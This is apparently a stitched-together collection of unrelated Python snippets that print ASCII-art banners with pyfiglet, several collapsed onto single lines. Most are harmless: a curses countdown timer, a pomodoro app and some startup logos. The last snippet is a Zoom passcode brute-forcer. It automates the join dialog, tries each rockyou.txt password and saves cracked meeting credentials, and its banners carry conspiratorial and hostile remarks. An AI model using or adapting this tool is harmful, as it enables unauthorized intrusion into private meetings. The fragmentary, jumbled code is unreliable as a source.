        "Jesse Lieberg", "Erik Doffagne", "Noah Ginsburg",
    ]))
    # Finale: cycling title, star field, then the screen "drops".
    scenes.append(Scene([
        Cycle(screen, FigletText("ASCIIMATICS", font='big'),
              screen.height // 2 - 8, stop_frame=100),
        Cycle(screen, FigletText("ROCKS!", font='big'),
              screen.height // 2 + 3, stop_frame=100),
        Stars(screen, (screen.width + screen.height) // 2, stop_frame=100),
        DropScreen(screen, 100, start_frame=100),
    ], 200))
    # Exit prompt, shown until resize/exit.
    scenes.append(Scene([
        Print(screen, SpeechBubble("Press 'X' to exit."),
              screen.height // 2 - 1, attr=Screen.A_BOLD),
    ], -1))
    screen.play(scenes, stop_on_resize=True)
def banner_generate(): f = Figlet(font='slant') return f.renderText('MicroPyFW')
def cli(): f = Figlet(font='slant') print(f.renderText('M y c a r t'))
def print_header(): """Why not. """ f = Figlet(font='big') print f.renderText('HackMiner') print "Version 0.2.1"
from pyfiglet import Figlet from termcolor import colored, COLORS text = input("What message do you want to print? ") color = input("What color? ") if color not in COLORS.keys(): color = 'white' # this is a really long comment that probably should be set over a couple # of lines and cleaned up. print(colored(Figlet().renderText(text), color))
from pyfiglet import Figlet import random from midiutil import MIDIFile import simpleaudio as sa import time print("\n------------------------------------------------------------------------------\n") #welcome font name_sign = Figlet(font='slant') print(name_sign.renderText('Irr Beat Gen V.1')) print("\n------------------------------------------------------------------------------\n") #input from user for time signature, does not accept invalid input while True: try: time_sig = input("Please enter a time signature like so: number/number\nThe second number can only be a 2, 4 or 8\n\n") or "7/8" time_sig_list = time_sig.split("/") time_sig1 = int(time_sig_list[0]) time_sig2 = int(time_sig_list[1]) except ValueError: print("\nYou can only enter (whole) numbers!\n") continue except IndexError: print("\nYou need to enter two numbers!\n") continue else: if time_sig1 == 0 or time_sig1 < 0: print("\nPlease enter a number higher than 0!\n") continue elif time_sig1 > 16:
def print_logo(text_logo): figlet = Figlet(font='slant') print(figlet.renderText(text_logo))
def show_app_title(): print(Figlet().renderText(config.yanom_globals.app_name)) f = Figlet(font='slant') print(f.renderText(config.yanom_globals.app_sub_name)) print(f"YANOM ver {config.yanom_globals.version}")
def countdown(stdscr, alt_format=False, font=DEFAULT_FONT, blink=False,
              critical=3, quit_after=None, text=None, timespec=None,
              title=None, voice=None, voice_prefix=None, exec_cmd=None,
              outfile=None, no_bell=False, no_seconds=False,
              no_text_magic=True, no_figlet=False, no_window_title=False,
              time=False, time_format=None, **kwargs):
    """Run an interactive, figlet-rendered countdown on a curses screen.

    The target time is parsed from *timespec*; each second the remaining
    time (or, with ``time=True``, the wall clock) is redrawn, optional
    voice/exec announcements fire at fixed marks, and keyboard input read
    by a background thread can pause, reset, extend, lap, or exit the
    countdown.  When the countdown reaches zero, an optional bell rings
    and *text* (or a blinking screen) is shown until exit or reset.

    Relies on module-level helpers and constants not visible here:
    parse_timestr, setup, draw_text, format_seconds, format_seconds_alt,
    normalize_text, input_thread_body, the INPUT_* action constants and
    DEFAULT_FONT -- see the rest of the file.

    NOTE(review): the boolean parameter ``time`` shadows any module-level
    ``time`` import inside this function.

    Raises:
        click.BadParameter: if *timespec* cannot be parsed.
    """
    try:
        sync_start, target = parse_timestr(timespec)
    except ValueError:
        raise click.BadParameter(
            "Unable to parse TIME value '{}'".format(timespec))
    # Shared curses lock, key-press queue and shutdown flag for the
    # background input thread.
    curses_lock, input_queue, quit_event = setup(stdscr)
    figlet = Figlet(font=font)
    if title and not no_figlet:
        try:
            title = figlet.renderText(title)
        except CharNotPrinted:
            # Title contains characters the font cannot render; drop it.
            title = ""
    voice_cmd = None
    if voice:
        # Pick whichever TTS binary exists (macOS `say` or Linux `espeak`).
        for cmd in ("/usr/bin/say", "/usr/bin/espeak"):
            if os.path.exists(cmd):
                voice_cmd = cmd
                break
    if voice or exec_cmd:
        voice_prefix = voice_prefix or ""
    input_thread = Thread(
        args=(stdscr, input_queue, quit_event, curses_lock),
        target=input_thread_body,
    )
    input_thread.start()
    seconds_total = seconds_left = int(
        ceil((target - datetime.now()).total_seconds()))
    try:
        while seconds_left > 0 or blink or text:
            # Re-read terminal width each frame so resizes re-wrap output.
            figlet.width = stdscr.getmaxyx()[1]
            if time:
                countdown_text = datetime.now().strftime(time_format)
            elif alt_format:
                countdown_text = format_seconds_alt(
                    seconds_left, seconds_total, hide_seconds=no_seconds)
            else:
                countdown_text = format_seconds(seconds_left,
                                                hide_seconds=no_seconds)
            if seconds_left > 0:
                with curses_lock:
                    if not no_window_title:
                        # OSC 2 escape sets the terminal window title.
                        os.write(
                            stdout.fileno(),
                            "\033]2;{0}\007".format(countdown_text).encode())
                    if outfile:
                        with open(outfile, 'w') as f:
                            f.write("{}\n{}\n".format(countdown_text,
                                                      seconds_left))
                    stdscr.erase()
                    try:
                        draw_text(
                            stdscr,
                            countdown_text if no_figlet
                            else figlet.renderText(countdown_text),
                            color=1 if seconds_left <= critical else 0,
                            fallback=title + "\n" + countdown_text
                            if title else countdown_text,
                            title=title,
                        )
                    except CharNotPrinted:
                        draw_text(stdscr, "E")
            # Decide whether this second deserves a spoken/exec announcement.
            annunciation = None
            if seconds_left <= critical:
                annunciation = str(seconds_left)
            elif seconds_left in (5, 10, 20, 30, 60):
                annunciation = "{} {} seconds".format(voice_prefix,
                                                      seconds_left)
            elif seconds_left in (300, 600, 1800):
                annunciation = "{} {} minutes".format(voice_prefix,
                                                      int(seconds_left / 60))
            elif seconds_left == 3600:
                annunciation = "{} one hour".format(voice_prefix)
            if annunciation or exec_cmd:
                if exec_cmd:
                    Popen(
                        exec_cmd.format(seconds_left, annunciation or ""),
                        stdout=DEVNULL,
                        stderr=STDOUT,
                        shell=True,
                    )
                if voice_cmd:
                    Popen(
                        [voice_cmd, "-v", voice, annunciation.strip()],
                        stdout=DEVNULL,
                        stderr=STDOUT,
                    )
            # We want to sleep until this point of time has been
            # reached:
            sleep_target = sync_start + timedelta(seconds=1)
            if time:
                sleep_target = sleep_target.replace(microsecond=0)
            # If sync_start has microsecond=0, it might happen that we
            # need to skip one frame (the very first one). This occurs
            # when the program has been startet at, say,
            # "2014-05-29 20:27:57.930651". Now suppose rendering the
            # frame took about 0.2 seconds. The real time now is
            # "2014-05-29 20:27:58.130000" and sleep_target is
            # "2014-05-29 20:27:58.000000" which is in the past! We're
            # already too late. We could either skip that frame
            # completely or we can draw it right now. I chose to do the
            # latter: Only sleep if haven't already missed our target.
            now = datetime.now()
            if sleep_target > now and seconds_left > 0:
                try:
                    # Block on the input queue; the timeout doubles as the
                    # inter-frame sleep.
                    input_action = input_queue.get(
                        True, (sleep_target - now).total_seconds())
                except Empty:
                    input_action = None
                if input_action == INPUT_PAUSE:
                    pause_start = datetime.now()
                    with curses_lock:
                        stdscr.erase()
                        try:
                            # Redraw in the "paused" colour while waiting.
                            draw_text(
                                stdscr,
                                countdown_text if no_figlet
                                else figlet.renderText(countdown_text),
                                color=3,
                                fallback=countdown_text,
                                title=title,
                            )
                        except CharNotPrinted:
                            draw_text(stdscr, "E")
                    # Wait (blocking) for the next key press to unpause.
                    input_action = input_queue.get()
                    if input_action == INPUT_PAUSE:
                        # Shift both anchors forward by the paused duration
                        # so the countdown resumes where it left off.
                        time_paused = datetime.now() - pause_start
                        sync_start += time_paused
                        target += time_paused
                if input_action == INPUT_EXIT:  # no elif here!
                    # input_action may have changed
                    break
                elif input_action == INPUT_RESET:
                    sync_start, target = parse_timestr(timespec)
                    seconds_left = int(
                        ceil((target - datetime.now()).total_seconds()))
                    continue
                elif input_action == INPUT_PLUS:
                    target += timedelta(seconds=10)
                elif input_action == INPUT_LAP:
                    continue
            sync_start = sleep_target
            seconds_left = int(
                ceil((target - datetime.now()).total_seconds()))
            if seconds_left <= 0:
                # we could write this entire block outside the parent while
                # but that would leave us unable to reset everything
                if not no_bell:
                    with curses_lock:
                        curses.beep()
                if text and not no_text_magic:
                    text = normalize_text(text)
                if outfile:
                    with open(outfile, 'w') as f:
                        f.write("{}\n{}\n".format(text if text else "DONE",
                                                  0))
                rendered_text = text
                if text and not no_figlet:
                    try:
                        rendered_text = figlet.renderText(text)
                    except CharNotPrinted:
                        rendered_text = ""
                if blink or text:
                    base_color = 1 if blink else 0
                    blink_reset = False
                    flip = True
                    slept = 0
                    extra_sleep = 0
                    # Post-countdown loop: blink the screen and/or show the
                    # final text until exit, reset, or quit_after expires.
                    while True:
                        with curses_lock:
                            os.write(
                                stdout.fileno(),
                                "\033]2;{0}\007".format(
                                    "/" if flip else "\\").encode())
                            if text:
                                draw_text(
                                    stdscr,
                                    rendered_text,
                                    color=base_color if flip else 4,
                                    fallback=text,
                                )
                            else:
                                draw_text(stdscr, "",
                                          color=base_color if flip else 4)
                        if blink:
                            flip = not flip
                        try:
                            sleep_start = datetime.now()
                            input_action = input_queue.get(
                                True, 0.5 + extra_sleep)
                        except Empty:
                            input_action = None
                        finally:
                            extra_sleep = 0
                        sleep_end = datetime.now()
                        if input_action == INPUT_PAUSE:
                            pause_start = datetime.now()
                            input_action = input_queue.get()
                            # Credit the time already slept this frame to
                            # the next frame's wait.
                            extra_sleep = (
                                sleep_end - sleep_start).total_seconds()
                        if input_action == INPUT_EXIT:  # no elif here!
                            # input_action may have changed
                            return
                        elif input_action == INPUT_RESET:
                            sync_start, target = parse_timestr(timespec)
                            seconds_left = int(
                                ceil(
                                    (target -
                                     datetime.now()).total_seconds()))
                            blink_reset = True
                            break
                        slept += (sleep_end - sleep_start).total_seconds()
                        if quit_after and slept >= float(quit_after):
                            return
                    if blink_reset:
                        # Reset requested: restart the outer countdown loop.
                        continue
    finally:
        # Always restore the window title, remove the status file, and
        # shut down the input thread, even on exceptions.
        with curses_lock:
            if not no_window_title:
                os.write(stdout.fileno(), "\033]2;\007".encode())
            if outfile:
                os.remove(outfile)
        quit_event.set()
        input_thread.join()
h1=dict(double=True), # + bold h2=dict(double=True), h3=dict(double=False, wide=True), # + bold h4=dict(double=False, wide=True), ) else: try: import sys if '-i' in sys.argv: # testing raise ImportError from pyfiglet import Figlet # gettin' figgy with it, na na na… header_mode = HeaderMode.FIGLET Figlet.render = Figlet.renderText _figlet_fonts = dict( h1=Figlet(font='standard', width=_width), h2=Figlet(font='small', width=_width), #~ h3=Figlet(font='wideterm', width=_width), ) except ImportError: header_mode = HeaderMode.NORMAL class StringCache(dict): ''' Used to cache rendered ANSI color/fx strings with a dictionary lookup interface. ''' def __init__(self, palette, **kwargs): self._palette = palette # allows renames to happen, currently supports em --> i self._renames = kwargs
def main(s): countdown_thread.start() # Start the countdown thread dc.update(large_image="main_icon", large_text="https://github.com/nicoladen05/pomodoro", state="Focusing...", end=time() + p.plainTime()) # Update the rich presence while True: try: s.clear() # Clear the screen text = Figlet(font='big') s.addstr(text.renderText(str(p.time( )))) # Print the text which is converted to ascii art by figlet s.addstr(f'\n State: {p.getState().capitalize()}' ) # Print the current state if p.plainTime( ) == 0: # Change the state after the countdown is finished notification(f'{p.getState().capitalize()} has finished!' ) # Send a notification s.addstr( '\n Press any key to continue') # Wait for confirmation curses.flushinp() s.getch() p.changeState() # Change the state to the next one # Set the next timer length if p.getState() == 'study': p.setTime(config.studyTime[0], config.studyTime[1], config.studyTime[2]) dc.update( large_image="main_icon", large_text="https://github.com/nicoladen05/pomodoro", state="Focusing...", end=time() + p.plainTime()) # Update the rich presence elif p.getState() == 'break': p.setTime(config.breakTime[0], config.breakTime[1], config.breakTime[2]) dc.update( large_image="main_icon", large_text="https://github.com/nicoladen05/pomodoro", state="Taking a break", end=time() + p.plainTime()) # Update the rich presence elif p.getState() == 'longBreak': p.setTime(config.longBreakTime[0], config.longBreakTime[1], config.longBreakTime[2]) dc.update( large_image="main_icon", large_text="https://github.com/nicoladen05/pomodoro", state="Taking a long break", end=time() + p.plainTime()) # Update the rich presence continue s.refresh() # Refresh the screen curses.napms(1000) # Sleep for one second except (KeyboardInterrupt, SystemExit): break except curses.error: print("Window too small")
from pyfiglet import Figlet,figlet_format #Create Colour pallete - Foreground colour_end = "\33[0m" colour_red = "\33[31m" colour_green = "\33[32m" colour_yellow = "\33[33m" colour_blue = "\33[34m" #Create Colour pallete - Background colour_violet_bg = "\33[45m" colour_blue_bg = "\33[44m" #Initialize Figlet game_header = Figlet(font= "slant") game_body = Figlet() #Initialize slow character print def Print_Slow(in_message): #Variable to slow display of character slow_display = os.sys.stdout #Loop through the characters for in_char in in_message: #Display character slow_display.write(in_char) #Flush characters
import pandas as pd
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from pyfiglet import Figlet
import colorama
from colorama import Fore, Back, Style

# NOTE(review): assumes the CSV lives in the working directory -- confirm.
df = pd.read_csv("arabicaWithBrands.csv")
f = Figlet(font='standard')

#select the valuable attribute columns
features = [
    'species', 'brand', 'country', 'region', 'altitude', 'company', 'aroma',
    'flavor', 'sweetness', 'body', 'acidity', 'balance', 'uniformity',
    'cupperPoints', 'totalPoints'
]


#combine column values into single string
def combine_features(row):
    """Join the feature columns of *row* into one space-separated string.

    FIX: the original concatenated the first six columns without str(),
    which raises TypeError when a cell holds NaN (a float); coercing every
    value through str() is robust and yields identical output for
    string-valued cells.  The column order matches ``features``.
    """
    return " ".join(str(row[column]) for column in features)
from pyfiglet import Figlet

prog = "Mirage"
descr = "Anomaly Detection Neural Network"
# Banner is printed before the heavy imports below so the user gets
# immediate feedback while sklearn/ijson load.
print(Figlet(font='ticksslant').renderText(prog) + "\n" + descr + "\n" + "-" * 100)

import ijson
import pandas as pd
import argparse
import json
import os
import numpy as np
import random
from sklearn.preprocessing import MinMaxScaler
from anomalous_lib.library.convolutional import Conv1DAutoEncoder
from sklearn.metrics import confusion_matrix


def test(args, df, config):
    """Score *df* with predict() and report a confusion matrix against ' Label'.

    BENIGN rows are treated as class 0, everything else as class 1; a row is
    flagged anomalous when its score exceeds the mean score.
    NOTE(review): mean-as-threshold is a crude operating point -- confirm.

    Returns the prediction frame concatenated with the ground-truth column.
    """
    df_y = df[[' Label']]
    df = df[[' Protocol', ' Destination Port', ' Source Port',
             'Init_Win_bytes_forward', ' Init_Win_bytes_backward']]
    df_preds = predict(args, df, config)
    threshold = df_preds["Mirage_Anomaly"].mean()
    tn, fp, fn, tp = confusion_matrix(
        np.where(df_y[" Label"] == "BENIGN", 0, 1),
        (df_preds["Mirage_Anomaly"] > threshold)).ravel()
    print(("FP: {}, FN: {},".format(fp, fn)) + '\n' +
          ("TP: {}. TN: {},".format(tp, tn)))
    # FIX: the original printed the raw 0..1 fraction with a '%' suffix;
    # scale by 100 so the reported accuracy really is a percentage.
    print("Accuracy:{}%".format(100.0 * float(tp + tn) / float(fp + tp + tn + fn)))
    return pd.concat([df_preds, df_y[" Label"]], axis=1)
def _print_logo(self):
    """Log an ASCII-art banner built from the configured name and version."""
    from pyfiglet import Figlet
    banner = Figlet(font='big').renderText(
        "%s %s" % (self.static_config.get("name"),
                   self.static_config.get("version")))
    logger.info("\n%s" % banner)
def _print_logo(self):
    """Log the CraftBeerPi startup banner, homepage and copyright lines."""
    from pyfiglet import Figlet
    banner = Figlet(font='big').renderText("CraftBeerPi %s " % self.version)
    logger.info("\n%s" % banner)
    logger.info("www.CraftBeerPi.com")
    logger.info("(c) 2021 Manuel Fritsch")
def hello(self):
    """Print 'Donurista' rendered as figlet ASCII art."""
    rendered = Figlet().renderText('Donurista')
    print(rendered)
def brute_force_link(self, meeting_id, dict='./rockyou.txt'):
    """Brute-force a Zoom meeting passcode via pyautogui screen automation.

    Opens the join dialog, types *meeting_id*, and if a passcode prompt
    appears, tries every line of the wordlist file *dict* until the
    './Let-u-in.png' waiting-room marker is detected; successful
    id:password pairs are appended to works.txt.

    NOTE(review): the parameter name ``dict`` shadows the builtin; it is
    kept because it is part of the public keyword interface.
    NOTE(review): indentation of the password loop was reconstructed from
    a collapsed source line -- verify against the original file.
    """
    print('[+] Starting to BruteForce Meeting ID : ')
    open_meeting_loc = pyautogui.locateOnScreen('./Open_Meeting.png')
    pyautogui.click(open_meeting_loc)
    self.enter_meeting = pyautogui.locateOnScreen('./Enter-Meeting.png')
    pyautogui.click(self.enter_meeting)
    pyautogui.typewrite(f'{meeting_id}')
    pyautogui.press('enter')
    if 'Enter meeting passcode' in pyautogui.getAllTitles():
        Bruter = Figlet()
        # FIX: the rendered banner was discarded by the original code;
        # print it so the ASCII-art header actually appears.
        print(Bruter.renderText('Ottoman-Bruter'))
        print(
            '[+] Sultan Abdul Hamid Han II - May God Almighty bless his soul and those martyrs who fought for the Caliphate Against the Young Turks and the Free Masons and Iluminati.'
        )
        print(
            '[+] Ottoman Motto: Fight against those who Oppress and Protect those who are Oppressed from the Oppressors'
        )
        print('[+] Ottoman-Bruter Forcer Started')
        if dict == './rockyou.txt':
            print(
                '[+] Using Default RockYou Password Dictionary [F**k the Byzantines, aka. British]'
            )
        else:
            print(
                '[*] Remember Dict should be of the Format:\n guess1\nguess2\nguess3\n'
            )
        # Load the wordlist; ignore undecodable bytes common in rockyou.txt.
        with open(dict, 'r', encoding='utf8', errors='ignore') as f:
            guess = f.read()
        self.guess = guess.split('\n')
        print(f'Password Guesses Loaded: {len(self.guess)}')
        let_u_in = pyautogui.locateOnScreen('./Let-u-in.png')
        while let_u_in is None:  # FIX: `is None`, not `== None`
            password_entry_location = pyautogui.locateOnScreen(
                './passcode.png')
            if password_entry_location is None:
                print(
                    '[**] Strange Anomaly Detected there is no Password Entry Box on the Screen'
                )
                print(
                    '[**] Please Bring it up on the Screen for the Program to Continue'
                )
                # Spin until the passcode box becomes visible again.
                while password_entry_location is None:
                    password_entry_location = pyautogui.locateOnScreen(
                        './passcode.png')
            else:
                pyautogui.click(password_entry_location)
                for password in self.guess:
                    print(f'[?] Trying Password: {password}')
                    pyautogui.typewrite(password)
                    join_meeting_button = pyautogui.locateOnScreen(
                        './join-meeting.png')
                    pyautogui.click(join_meeting_button)
                    sleep(8)  # give Zoom time to accept/reject the attempt
                    check_fail_1 = pyautogui.locateOnScreen(
                        './failed-attempt.png')
                    if check_fail_1 is None:
                        let_u_in = pyautogui.locateOnScreen('./Let-u-in.png')
                        if let_u_in is not None:
                            print(
                                f'[+] Password Found Now in Waiting Room - Password is {password} for ID {meeting_id}'
                            )
                            with open('works.txt', 'a+') as f:
                                f.write(f'{meeting_id}:{password}\n')
                            break
        print('Ottoman Brute Forcer Completed Execution')
        print('Allah is the Greatest ....')